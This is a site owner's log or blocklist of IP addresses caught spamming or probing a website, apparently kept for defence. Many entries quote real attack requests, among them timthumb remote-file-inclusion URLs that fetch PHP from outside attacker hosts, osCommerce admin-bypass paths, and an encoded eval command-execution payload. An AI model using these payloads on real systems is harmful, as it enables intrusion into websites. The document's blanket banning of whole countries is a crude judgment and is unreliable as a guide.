101.0.0.0 – 101.255.255.255 Undesireable country – CHINA
142.4.201.65 Hostname: 142.4.201.65.mohitseo.com
Hosting Company: United – States Dallas Ovh
Comment Spammer
Fake e-mail example: imxkmhcl@gmail.com
Name example: “Ways To Lose Stomach Fat”
99.192.1.18 Hostname: fctnnbsc30w-099192001018.dhcp-dynamic.FibreOp.nb.bellaliant.net
Hosting Company: Canada – Sydney Bell Aliant/dsl-hsi
Attempting server config hack:
sftp-config.json
109.124.98.250 Russian Federation – Megafiltr Attempted to access administrator.php
82.168.50.134 Hostname: 82-168-50-134.ip.telfort.nl Spam Harvester
212.38.177.109 Spam Harvester
216.189.163.160 Spam Harvester
74.125.182.47 Hostname: ia-in-f47.1e100.net Comment Spammer
208.80.164.4t User Agent: Sogou web spider/4.0(+http: //www.sogou.com/docs/help/webmasters.htm#07)
Hosting Company: United States – Lake Charles Cameron Telephone
Hackerbot – attempts WordPress exploit
//wp-content/themes/TheStyle/timthumb.php?src=http:
//wordpress.com.aquasulisco.com/thumb.php
91.142.220.113 Hostname: cmastic.vservers.es
Hosting Company: Spain – Malaga Axarnet Comunicaciones Sl
Multiple brute force attempts at WordPress exploit:
/wp-content/themes/TheStyle/timthumb.php?src=http:
//img.youtube.com.toptutor.hk/upload.php
91.224.160.25 Hostname: hosted-by.bergdorf-group.com
Hosting Company: Netherlands – Amsterdam Bergdorf Group Ltd.
Attempted PHP / SQL admin hack.
/mysqladmin/index.php
/webdb/index.php
/php-myadmin/index.php
71.167.141.45 Hostname: static-71-167-141-45.nycmny.fios.verizon.net
Hosting Company: United States – Pt. Washington Crestwood Computer Corp
Trying osCommerce exploit
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
174.121.194.202 Hostname: new.newsprofession.com
Hosting Company: United States – Dallas Theplanet.com Internet Services Inc.
Attempting “Is-human WordPress Plugin Remote Command Execution Vulnerability”
Mail Server and Disctionary Attacker
27.159.216.227 UA: Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.229 Version/11.64 Comment spammer
202.98.203.252 Tegistrar: China Guiyang Chinanet Guizhou Province Network
UA: Opera/9.80 (Windows NT 6.1; U; MRA 6.0 (build 5680); ru) Presto/2.10.289 Version/12.00
Comment spammer – found my honeypot trap file
91.207.7.190 Hostname: 190.7.207.91.unknown.steephost.net Comment spammer – found my honeypot trap file
184.173.2.190 Hostname: wealthworld.wealthworld.com
United States – Dallas Theplanet.com Internet Services Inc.
Looking to exploit WordPress timthumb vulnerability scanner plugin
//wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?
src=http: //flickr.com.alba-sport.net/bad.php
200.98.68.236 Hostname: 200-98-68-236.clouduol.com.br Looking for exploit in WordPress Timthumb Vulnerability Scanner Plugin
//wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?
src=http: //wordpress.com.alumnipmc.com/index.php
81.17.21.156 Hostname: virtu.ir
Hosting Company: Switzerland – Meinier Client
Attempting timthumb exploit:
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.aksiadam.net/byroe.php
121.246.86.37 Hostname: 121.246.86.37.static-ahmedabad.vsnl.net.in
Hosting Company: India – Ahmedabad Internet Service Provider
Comment Spammer, Spam Harvester, Mail Server, Dictionary Attacker
173.213.97.20 Spammer. Tried to post comments and register new account on restricted site.
64.120.63.96 Hostname: 64.120.63.96.rdns.ubiquityservers.com
Hosting Company: United States – Dover Nobis Technology Group Llc
Comment Spammer:
Sample message text: “Spot on with this write-up, I actually believe this website …”
Link URL: http: //expertdecoders.com
Name: bypasscaptcha key
e-mail: jess_yamamoto@t-online.de
173.213.108.105 Hosting Company: United States- Lilburn Infinitie Networks Cloud Vps Comment Spammer:
Sample message: I do believe this is a great blog. I stumbledupon it 😉
I’m going to revisit yet again since I bookmarked it. Money and freedom is the best way to change,….
Name: jdownloader captcha
e-mail: ivorysebastian@t-online.de
198.15.126.157 Hosting Company: United States – Phoenix Secured Servers Llc Comment Spammer
178.137.161.214 Hostname: 178-137-161-214-lvv.broadband.kyivstar.net
Hosting Company: Ukraine – Kiev Kyivstar Gsm
Trying to access wp-login.php
/admin.php
/administrator/index.php
63.247.68.181 Hosting Company: United States – Atlanta Global Net Access Llc Looking for WordPress GD Star Rating plugin vulnerabilty:
/wp-content/gd-star-rating/timthumb.php?
src=http%3A%2F%2Fflickr.com.colortemplates.in%2Fbad.php
85.214.234.56 Hostname: h1867931.stratoserver.net
Hosting Company: Germany – Berlin Strato Ag
Looking for WordPress GD Star Rating plugin vulnerability
//wp-content/gd-star-rating/?src=http: //flickr.com.twinsticktours.com/simple.php
80.48.31.188 Hostname: 188.rev.iat.pl
Hosting Company: Poland – Telekomunikacja Polska S.a.
Looking for WordPress GD Star Rating plugin vulnerability
//wp-content/gd-star-rating/?src=http: //flickr.com.bliskoboga.waw.pl/bot.php
190.120.238.137 Hosting Company: Panama – Panama Infolink Panama Corp. Looking for WordPress GD Star Rating plugin vulnerability
//wp-content/gd-star-rating/?src=http: //img.youtube.com.toptutor.hk/upload.php
37.59.49.11 Hostname: clientsrv03.dzservices.net
Hosting Company: France – Roubaix Ovh Sas
Looking for WordPress GD Star Rating plugin vulnerability
//wp-content/gd-star-rating/?src=http: //img.youtube.com.toptutor.hk/upload.php
173.236.67.101 Hostname: node1.hhwebsites.net
Hosting Company: United States – Chicago Singlehop Inc.
Attempting WordPress Is-Human plugin exploit
/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZW
NobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK));error
119.82.66.137 Hosting Company: India Noida Spectra Isp Networks Private Limited Spammer
87.238.162.146 Hostname: vz10.stone-is.net
Hosting Company: Belgium Brussels Stone Internet Services Bvba
Attempting osCommerce/wpOnlineStore/Zencart exploit:
/admin/categories.php/login.php
/admin/file_manager.php/login.php
184.22.108.73 Hostname: 184-22-108-73.static.hostnoc.net
Hosting Company: United States – Leesburg Network Operations Center Inc
Numerous attempts to create user account:
account/register.php
user/register
tools/quicklogin.one and more
Also – /+encodeURIComponent(location.href)+
87.205.101.134 Hostname: 87-205-101-134.adsl.inetia.pl
Hosting Company: Poland Netia Sa
Mail Server, Spammer
Banned for looking for non-existent file: mobiquo.php
38.113.234.180 Hostname: crawl0.kosmix.com
Hosting Company: United States – San Bruno Kosmix Corporation
Kosmix Search Engine:
Rule breaker: ignores robot.txt rules. Fails to get robots.txt,
Does not identify itself with a User Agent
38.99.97.38 Hostname: h-97-38.scoutjet.com
UA: Mozilla/5.0 (compatible; Blekkobot; ScoutJet; +http: //blekko.com/about/blekkobot)
Mozilla/5.0 (compatible; ScoutJet; +http: //www.scoutjet.com/)
Hosting Company: United States – Annapolis Blekko
Blekkobot
Bad spider. Rule Breaker.
No value as traffic referrr
94.23.238.52 Hostname: ns308573.ovh.net
Hosting Company: France – Roubaix Ovh Sas
Bad activity detected – looks like Apche server script injection attempt:
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_
REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=test??
More info
91.142.217.24 Hostname: vps314.singularweb.com
Company: Spain – Malaga Axarnet Comunicaciones Sl
WordPress timthumb exploit attempt:
//wp-content/themes/meintest/layouts/thumb.php?src=http:
//picasa.com.amisenscene.fr/countxx.php
94.228.34.248 UA: magpie-crawler/1.1 (U; Linux amd64; en-GB; +http: //www.brandwatch.net) Scraper
69.175.22.170 Hostname: vps01.ravenoushosting.com
Company: United States – Chino Hills Singlehop Inc.
Trackback Spammer/Coment Spammer
Looking for xmlrpc.php
188.138.244.205 Hostname: 188-138-244-205.starnet.md
Company: Moldova, Republic Of – Chisinau Starnet S.r.l
Numerous login attemps:
/wp-login.php?action=register
/login.php
/signup.php
212.48.66.208 Hostname: vps10861750.123-vps.co.uk
Company: United Kingdom – Derby Webfusion Internet Solutions
Isreal IP
Attempting timthumb exploit:
/wp-content/plugins/extend-wordpress/helpers/thumbopen.php?src=http:
//blogger.com.mesutpinar.com/file.php
Blocked by htaccess script – Subsequently banned
Attempted sCommerce/wpOnlineStore exploit
/admin/categories.php/login.php?cPath=&action=new_product_preview
208.83.235.116 Company: United States – San Clemente Marketing Star Attempting osCommerce/wpOnlineStore exploit
/admin/categories.php/login.php?cPath=&action=new_product_preview
85.214.219.159 Hostname: h2017438.stratoserver.net
Company: Germany – Berlin Strato Ag
Attempting osCommerce/wpOnlineStore exploit
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/file_manager.php/login.php
97.76.0.78 Hostname: rrcs-97-76-0-78.se.biz.rr.com
Company: United States – Orlando Road Runner Holdco Llc
Attempting hack / wpOnlineStore/osCommerce exploit
/admin/sqlpatch.php/password_forgotten.php?action=execute
/admin/record_company.php/password_forgotten.php
69.50.197.238 Hostname: aws.tomalish.net
Company: United States – Huntersville Atjeu Publishing Llc
Attempted WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http: //flickr.com.twinsticktours.com/
simple.php
108.59.11.73 Hostname: 108.59.11.73
Company: United States – Manassas Leaseweb Usa Inc.
Attempted timthumb exploit:
/wp-content/themes/u-design/scripts/timthumb.php?src=http:
//blogger.com.landescapedesigns.com/class-blog.php
Blocked by .htaccess script – subsequently banned
200.98.146.48 Hostname: 200-98-146-48.clouduol.com.br
Company: Brazil – Sao Paulo Universo Online S.a.
Attempted WordPress GD Star Rating plugin exploit:
/wp-content/gd-star-rating/timthumb.php?src=http:
//wordpress.com.scriptjoey.com/joey2.php
192.162.19.194 Company: Ukraine – Rivne Fop Budko Dmutro Pavlovuch
192.162.0.0 – 192.162.255.255 Banned
Comment Spammer
Undesireable Country – UKRAINE
72.172.130.13 Hostname: s13.n130.n172.n72.static.myhostcenter.com
Company: United States – Columbus Jumpline Inc
Attempted timthumb exploit
/content/wp-content/themes/theblock/timthumb.php?src=http:
//blogger.com.landescapedesigns.com/class-blog.php
72.172.130.13 Hostname: pool-96-254-44-124.tampfl.fios.verizon.net
Company: United States – Largo Verizon Online Llc
Malware injection attempt:
/xjs/_/js/hp/sb_he,pcc/rt=j/ver=ekMxmVjFIzI.en_US./d=1/sv=1/rs=AItRSTM0lksRtI2VxMWJM1mGGSAc7V2OnQ
More info:
108.62.71.206 Hostname: static-108-62-71-206.nextroute.co
Company: United States – Chicago Ubiquity Server Solutions Chicago
Tried to login to website using non-existemt username “janie9”
49.205.197.173 Hostname: ras.beamtele.net
Company: India – Hyderabad Beam Telecom Pvt Ltd
Trying to login/register:
/pg/register
/join.php
130.185.156.232 Company: United States – Buffalo Deepak Mehta Fie Tried to register acount:
/user/register
76.73.5.2 Hostname: server2.up4.net
Company: United States – Denver Fdcservers.net
Attempted osCommerce/wpOnlinestore/ZenCart admin exploit
/admin/file_manager.php/login.php
/admin/categories.php/login.php
/banner_manager.php/login.phpProbing for timthumb vulnerabilty
//wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=http:
//blogger.com.arztree.com/idss.php
Hostname: server2.up4.net
193.104.168.111 Hostname: linux10.mesh-internet.co.uk
Company: United Kingdom – Mesh Internet Ltd
Attempted osCommerce/wpOnlinestore/ZenCart admin exploit
/admin/file_manager.php/login.php
/admin/categories.php/login.php
/banner_manager.php/login.php
69.175.22.170 Hostname: vps01.ravenoushosting.com
Company: United States – Chino Hills Singlehop Inc.
Comment/Trackback Spammer:
Sample message: sports betting…
URL link: www DOT betxchange.co.za/
83.23.141.139 Hostname: dfl139.neoplus.adsl.tpnet.pl
Company: Poland – Telekomunikacja Polska S.a.
Attempting to access admin and register on site
/wp-login.php?action=register
/wp-login.php?registration=disabled
/dodaj,strone/
/admin/
68.67.77.60 Hostname: server1.bytegrafix.in Attempting WordPress GD Star Rating plugin / timthumb exploit
wp-content/gd-star-rating/?src=http: //picasa.com.deanswebsite.org/thumb.php
//wp-content/gd-star-rating/?src=
174.122.61.13 Hostname: acc.accentscityinternational.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Attempting wpOnlineStore/osCommerce exploit
/admin/categories.php/login.php
50.97.138.110 Hostname: drawer.mysitehosted.com
Company: United States – Dallas Softlayer Technologies Inc.
Attempting wpOnlineStore/osCommerce exploit
/admin/categories.php/login.php
222.122.142.233 Company: Korea, Republic Of Seoul Korea Telecom Server directed injection attempt
///?_SERVER[DOCUMENT_ROOT]=
http: //board.kcm.co.kr///skin/zero_vote/images/t.gif??
/security//?_SERVER[DOCUMENT_ROOT]=
http: //board.kcm.co.kr///skin/zero_vote/images/t.gif??
198.15.126.172 Company: United States Phoenix Secured Servers Llc Comment Spammer
Found honeypot trap file
204.124.181.122 Hostname: www1.tennismatch.cc
Company: United States Scranton Volumedrive
Trying to register account on restricted site:
/?q=user/register
/user/register
189.76.176.10 Hostname: cpanel.visaonet.com.br
Company: Brazil – Sao Paulo Visaonet Telecom Ltda.
Attempted wpOnlineStore/osCommerce exploit
/admin/categories.php/login.php
/admin/categories.php/login.php?cPath=&action=new_product_preview
211.142.236.132 Company: China – Changsha China Mobile Communications Corporation – Hunan Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
27.24.159.206 Company: China Wuhan Chinanet Hubei Province Network Spammer looking for comment forms: article URL/+Result:+it+is+
not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
122.72.76.133 China – Beijing China Tietong Telecommunications Corporation Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
122.72.80.101 China – Beijing China Tietong Telecommunications Corporation Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
124.160.147.173 Company: China – Hangzhou China Unicom Zhejiang Province Network Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
124.160.147.165 Company: China – Hangzhou China Unicom Zhejiang Province Network Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
123.129.240.171 Company: China – Jinan Jinanidc Hexun Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
218.93.127.121 Company: China – Nanjing Chinanet Jiangsu Province Network Comment Spammer
109.200.9.194 Hostname: webserver01.kapang.com
Company: United Kingdom – Gosport Redstation Limited
Attempting wpOnlineStore/osCommerce exploit
/admin/categories.php/login.php
/admin/categories.php/login.php?cPath=&action=new_product_preview
173.213.108.106 Company: United States – Lilburn Infinitie Networks Cloud Vps Comment Spammer – uses CAPTCHA bypss – jdownloader captcha
(http: //bypasscaptcha.net/)
168.172.0.254 Hostname: vpnpta.tut.ac.za
Company: South Africa – Johannesburg Technikon Pretoria
Mail Server, Dictionary Attacker
Probing for vulnerabilites: /mt-static/js/tc/client.js
202.191.56.207 Company: Viet Nam Ha Noi Hanoi Universsity Of Technology Looking for WordPress timthumb vulnerability
//versitility/timthumb.php?src=http: //img.youtube.com.toptutor.hk/upload.php
85.236.51.26 Hostname: 26-51-236-85.rev.customer-net.de
Company: Germany – Holzkirchen Scope Xl
Attempting wpOnlineStore/osCommerce exploit:
/admin/file_manager.php/al.shaena.php
/admin/categories.php/al.shaena.php?cPath=&action=new_product_preview
/admin/banner_manager.php/al.shaena.php
91.207.5.214 Hostname: reverse.214.5.207.91.reserver.ru
Company: Ukraine Kharkiv Pp Andrey Kiselev
Looking for WordPress timthumb vulnerability
//wp-content/themes/LondonLive/thumb.php?
src=http: //img.youtube.com.precastsystemsinc.com/index2.php
221.238.12.243 Hostname: 243.12.238.221.broad.tj.tj.dynamic.163data.com.cn
Company: China – Tianjin Geli Ltd
Mail server, Dictionary Attacker, Comment Spammer
Found Honeypot trap file
198.15.124.78 Company: United States – Phoenix Secured Servers Llc Comment Spammer
88.119.188.237 Company: Lithuania – Kaunas Teo Lt Ab Attempting WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?
src=http: //img.youtube.com.fitnessmundo.net/func.php
199.19.110.146 Company: United States – Scranton Leyton Reed Comment Spammer
109.104.78.114 Hostname: lvps109-104-78-114.vps.webfusion.co.uk
Company: United Kingdom – Derby Webfusion Internet Solutions
Attempting timthumb exploit:
/wp-content/plugins/styles-with-shortcodes/includes/timthumb.php?src=http: //wordpress.company.patoatomico.com.br/wp-login.php
76.87.83.30 Hostname: cpe-76-87-83-30.socal.res.rr.com
Company: United States – Los Angeles Road Runner Holdco Llc
Multiple attempts on wp-signup
64.15.156.57 Hostname: not-assigned.privatedns.com
Company: Canada – Montreal Iweb Dedicated Cl
Attempting ZenCart/osCommerce/wpOnlineStore admin script injection exploit
/extras/curltest.php
/admin/sqlpatch.php/password_forgotten.php?action=execute
198.144.116.2 Company: United States Torrance Giglinx Inc. Comment Spammer
Tried to force account registration – /index.php?do=/user/register/
198.15.122.186 Company: United States – Phoenix Secured Servers Llc Comment spammer
Found Honeypot trap file
198.15.126.163 Company: United States – Phoenix Secured Servers Llc Comment spammer
Found Honeypot trap file
198.15.126.155 Company: United States – Phoenix Secured Servers Llc Comment spammer
Found Honeypot trap file
89.145.95.2 UA: Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http //www grapeshot.co.uk/crawler.php)
Hostname: www grapeshot.co.uk
Company: United Kingdom – London Grapeshot Ltd
Grapeshot Crawler Bot:
Rulebreaker – gets then ignores robots.text
219.94.169.50 Company: Japan – Sakura Sakura Internet Inc. Mail Server
Attempting ZenCart/osCommerce/wpOnlineStore admin script injection exploit
admin/sqlpatch.php/password_forgotten.php
190.158.236.98 Hostname: Static-IP-cr19015823698.cable.net.co
Company: Colombia – Bogota Telmex Colombia S.a.
Comment Spammer
174.142.246.33 Hostname: not-assigned.privatedns.com
Company: Canada – Montreal Serversp
Attempting ZenCart/osCommerce/wpOnlineStore admin script injection exploit
/admin/sqlpatch.php/password_forgotten.php?action=execute
108.62.71.241 Hostname: static-108-62-71-241.nextroute.co
Company: United States – Chicago Ubiquity Server Solutions Chicago
Comment Spammer using CAPTCHA bypass tools
199.19.110.147 Company: United States – Scranton Leyton Reed Comment Spammer
103.9.103.131 Hostname: duck.vodien.com
Company: Singapore – Singapore Vodien Internet Solutions Pte Ltd
Hacker
/%22radykal-fancy-gallery%22http: //flicker.com.flaplight.net/bot.txt??
&sa=U&ei=g87BUKiPN8eH4AT6vIGgBg&ved=0CGsQFjAmOKwC&usg=AFQjCNEYA7qtKBy6EwbkfOx9GVhxZLZEdw/%22radykal-fanc
/%22radykal-fancy-gallery%22test??
UA: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
67.225.163.95 Hostname: host.bsncaribbean.net
Company: United States – Lansing Liquid Web Inc.
Attempted timthumb exploit:
//wp-content/themes/Quadro/timthumb.php?
src=http: //blogger.com.advcycles.com/xx.php
//wp-content/themes/Quadro/timthumb.php?
src=http: //blogger.com.advcycles.com/bot.php
//wp-content/themes/Quadro/timthumb.php?
src=http: //blogger.com.advcycles.com/user.phpAppeared to be botnet brute force or DDOS attack with +200 hundred attempts in 3 minutes from this IP, along with similar activity from about other IPsPrevious sighting
/wp-content/themes/object/thumb.php?
src=http: //picasa.com.juicycouture.com.au/xx.php
//wp-content/themes/object/thumb.php?
src=http: //picasa.com.juicycouture.com.au/bot.php
//wp-content/themes/object/thumb.php?
src=http: //picasa.com.juicycouture.com.au/user.php
74.91.27.82 Hostname: compwxr.com
Company: United States – Kansas City Alec Istomin
Trying to register account:
/user/register
/?q=user/register
68.71.50.245 Company: Canada – Montreal Netelligent Hosting Services Inc. Attempted osCommerce/wpOnlineStore exploit:
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
91.236.74.110 Company: Poland – Przedsiebiorstwo Uslug Specjalistycznych Elan Mgr Inz. Andrzej Niechcial Comment Spammer:
Tried several times to register account on restricted site
199.19.109.122 Company: United States – Scranton Volumedrive Spam-Bot trying to post comment
180.76.5.155 UA: Mozilla/5.0 (compatible; Baiduspider/2.0; +http: //www.baidu.com/search/spider.html)
Hostname: baiduspider-180-76-5-155.crawl.baidu.com
Another Baidu Search engine IP
71.8.242.4 Hostname: cent6.vistabeam.com
Company: United States Mitchell Vistabeam
Attempting WordPress Is-Human plugin vulnerabbility exploit
//wp-content/plugins/is-human/thumb.phptimthumb.php?
src=http: //gardengateneedlepoint.com/store/pub/a.php
//wp-content/plugins/is-human/thumb.php.cache/
c54af1d13e884a4c63da8f3098a7a4da.php
168.144.144.42 Hostname: vps-1117313-13475.manage.myhosting.com
Company: Canada – Toronto Softcom Technology Consulting Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
147.222.2.1 Hostname: barney.gonzaga.edu
Company: United States – Spokane Gonzaga University
Attempting WordPress Is-Human plugin vulnerabbility exploit
//wp-content/plugins/is-human/thumb.php?
src=http: //blogger.com.gilacode.org/x.php
54.242.154.11 Hostname: ec2-54-242-154-11.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Looking for CSS files. No referrer. Assume trying to use site as free CDN
BANNED
89.16.173.60 Hostname: filmvideo.vm.bytemark.co.uk
Company: United Kingdom – York Bytemark Computer Consulting Ltd
Attempted timthumb exploit:
//wp-content/themes/canvas/thumb.php?
src=http: //flickr.com.sentient.pk/jahat.php
96.47.226.22 Hostname: wannabe.torservers.net Comment Spammer
74.120.15.150 Hostname: manning1.torservers.net (maybe faked)
Hostname: raskin.torservers.net
Company: Germany Dresden Torservers.net
Comment Spammer
173.254.192.36 Hostname: manning1.torservers.net (maybe faked)
Hostname: 173.254.192.36.zbusa.com
Company: Germany Dresden Torservers.net
Comment Spammer
85.25.145.90 Hostname: golf835.server4you.de
Company: Germany – Frankfurt Am Main Intergenia Ag
Attempted timthumb exploit:
//wp-content/themes/Quadro/timthumb.php?
src=http: //img.youtube.com.fitnessmundo.net/func.php
198.24.140.179
198.24.140.154
198.24.140.170
Company: United States – Phoenix Secured Servers Llc Comment Spammer – found honeypot trap file
124.124.58.149 Company: India Mumbai – Reliance Infocomm Ltd Internet Data centre Mail server / Dictionary Attacker
Tried logging in to site admin
213.181.73.145 Company: Spain Murcia Producmedias.l.u. Comment Spammer
23.19.72.239 Company: United States Phoenix Nobis Technology Group Phoenix Comment Spammer
199.180.131.9 Hostname: server.impjoyas.info
Company: United States – Lawrence Dnsslave.com
Comment Spammer
173.213.108.135 Company: United States – Lilburn Infinitie Networks Cloud Vps Comment Spammer – uses CAPTCHA BYPASS software
23.19.92.12 Hostname: 23.19.92.12.rdns.ubiquity.io
Company: United States – Phoenix Nobis Technology Group Phoenix
Comment Spammer
12.181.204.36 Hostname: vpn.catalent.com
Company: United States – Hillsboro Atos Origin
Mail Server and Comment Spammer
188.143.232.153 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Comment Spammer
Brute Force login attacker
Hacker – attempted to access MyPHP, MySGL admin:
/dbadmin/index.php
/PMA/index.php
/myadmin/index.php
/php-my-admin/index.php
/sqlmanager/index.php and others
46.229.160.172 Website: webstatsdomain.com
Hosted by: United States – Advanced Hosters
Spy Website.
Creates numerous btoken URLS in Google index
Read More
83.46.171.1 Hostname: 1.Red-83-46-171.dynamicIP.rima-tde.net
Company: Spain Madrid Telefonica De Espana Sau
Comment Spammer
Mail Server
173.213.108.161 Company: United States Lilburn Infinitie Networks Cloud Vps Comment Spammer using CAPTCHA BYPASS tools
211.172.241.50 Hostname: hostingnara.com
Company: Korea, Republic Of – Seoul Korea Internet Data Center Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
23.23.210.210 Hostname: ec2-23-23-210-210.compute-1.amazonaws.com
Company: United States Ashburn Amazon.com Inc.
Attempted timthumb exploit:
//wp-content/themes/theblock/timthumb.php?src=http: //wordpress.com.community.ingatlanajandekozas.hu/img.php
216.70.89.79 Hostname: thingsithinkabout.com
Company: United States – Culver City Media Temple Inc.
Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/
?src=http: //flickr.com.mercadodecorotos.com/index.php
Attempted timthumb exploit:
/wp-content/plugins/timthumb-vulnerability-scanner/
cg-tvs-admin-panel.php?src=http%3A%2F%2Fflickr.com.
beatmaking-software.net%2Fvera.php
46.45.171.154 Hostname: 46-45-171-154.turkrdns.com
Company: Turkey – Istanbul Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti.
Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?
src=http: //flickr.com.mercadodecorotos.com/index.php
Simultaneous attack with 216.70.89.79
78.158.11.226 Hostname:cl-78-158-11-226.fastlink.lt
Company: Lithuania – Vilnius Uab Consilium Optimum
Rule Breaker
63.143.50.149 Hostname: thx.asmaislinda.com
Company: United States – Dallas Limestone Networks Inc.
Hacker:
//albizia/includes?src=http%3A//img.youtube.com.toptutor.hk/upload.php
//wp-content/plugins/wp-pagenavi?
src=http%3A//img.youtube.com.toptutor.hk/upload.php
173.212.198.44 Hostname: 173-212-199-44.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Comment Spammer
/wp-comments-post.php
50.17.163.159 Hostname: ec2-50-17-163-159.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
85.159.68.58 Hostname: mail.ozhat.com.tr
Company: Turkey Istanbul Cizgi Telekomunikasyon Hizmetleri Sanayi Ve Ticaret Limited Sirketi
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
62.205.10.72 Hostname: mail.puntoweb.net
Company: Italy – Pisa Dev Italia Srl
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
131.234.144.185 Hostname: unisport.uni-paderborn.de
Company: Germany – Paderborn Universitaet Paderborn
Attempted wpOnlineStore/osCommerce/Zencart exploit
//admin/categories.php/login.php?cPath=&action=new_product_preview
93.186.180.251 Hostname: jaggledell.oxilion.nl
Company: Netherlands – Enschede Oxilion B.v.
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/banner_manager.php/login.php
149.126.19.106 Hostname: 149-126-19-106.obit.ru
Company: Russian Federation – Saint Petersburg Obit-telecommunications Ltd.
Mail Harvester/ Mail Spammer
64.207.179.177 Company: United States – Santa Monica Media Temple Inc. Attempted wpOnlineStore/osCommerce/Zencart exploit
//admin/categories.php/login.php?cPath=&action=new_product_preview
62.193.235.191 Hostname: wpc2395.amenworld.com
Company: France – Paris Amen
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
187.60.44.240 see next Company: Brazil – Sao Paulo Infoway Servicos De Informatica Ltda
Webserver: 2 websites – jebnet.com.br , yasnet.com.br
Attempted wpOnlineStore/osCommerce/Zencart exploit
//admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
198.24.138.29 Company: United States – Phoenix Secured Servers Llc Comment Spammer:
Found Honeypot trap file
198.15.126.170 Company: United States – Phoenix Secured Servers Llc Comment Spammer:
Found Honeypot trap file
108.27.246.58 Hostname: pool-108-27-246-58.nycmny.fios.verizon.net
Company: United States New York City Verizon Online Llc
Comment Spammer / Trackback Spammer
Looked for non existent xmlrpc.php file (WordPress trackbacks)
173.255.240.241 Hostname: li250-241.members.linode.com BANNED HOST – members.linode.com
Only ever seen pings on the domain from any IP from members.linode.com.
Pages never get viewd – Resource Waster
208.131.138.16 Hostname: dl17.ymgg.us
Company: United States – New York City Westhost Inc.
Attempting Uploadify exploit
/scripts/uploadify/uploadify.css?
173.203.240.55 Hostname: st5x002.newhostingaccount.net
Company: United States – San Antonio Rackspace Hosting
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/banner_manager.php/login.php
217.171.192.34 Hostname: www1.monsternett.no
Company: Norway – As Monsternett As Halden Norway
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
108.170.58.34 Company: United States – Phoenix Secured Servers Llc Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?src=http: //wordpress.com.ori-beauty.co.uk/eva.php
81.144.138.34 Hostname: crawl-81-144-138-34.wotbox.com
Company: United Kingdom – Newport Ayima Ltd
UA: Wotbox/2.01 (+http: //www.wotbox.com/bot/)
Mail Server / Dictionary Attacker
Resource waster bot
Rule Breaker
91.224.246.150 Company: Latvia Riga – Sia Teronet Comment Spammer
Found Honeypot trap file
216.99.157.213 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Comment Spammer
Tried to access folder directory
110.85.127.53 Company: China – Putian Chinanet Fujian Province Network Comment Spammer
50.116.10.252 Hostname: li456-252.members.linode.com BANNED HOST – members.linode.com
85.25.145.54 Hostname: golf835.server4you.de
Company: Germany – Frankfurt Am Main Intergenia Ag
Attempted WordPress GD Star Rating plugin and timthumb exploit
/!tim%20wp-content/gd-star-rating/timthumb.php
?src=http%3A%2F%2Fflickr.com.machine-a-barbe-a-papa.fr%2Fbad.php
[URL]/&sa=U&ei=iP_OUMTRCZDNswaSiICQDw&ved=0CCkQFjAE&usg=
AFQjCNESN5n-L__IUh9CO9R2T8_GB2-6kw/!tim%20wp-content/
91.232.96.29 Company: Germany – Xirra Gmbh Comment Spammer:
Looking for forums in several languages
/forum/
/foro/
/forums/
173.203.241.166 Hostname: st5x002.newhostingaccount.net
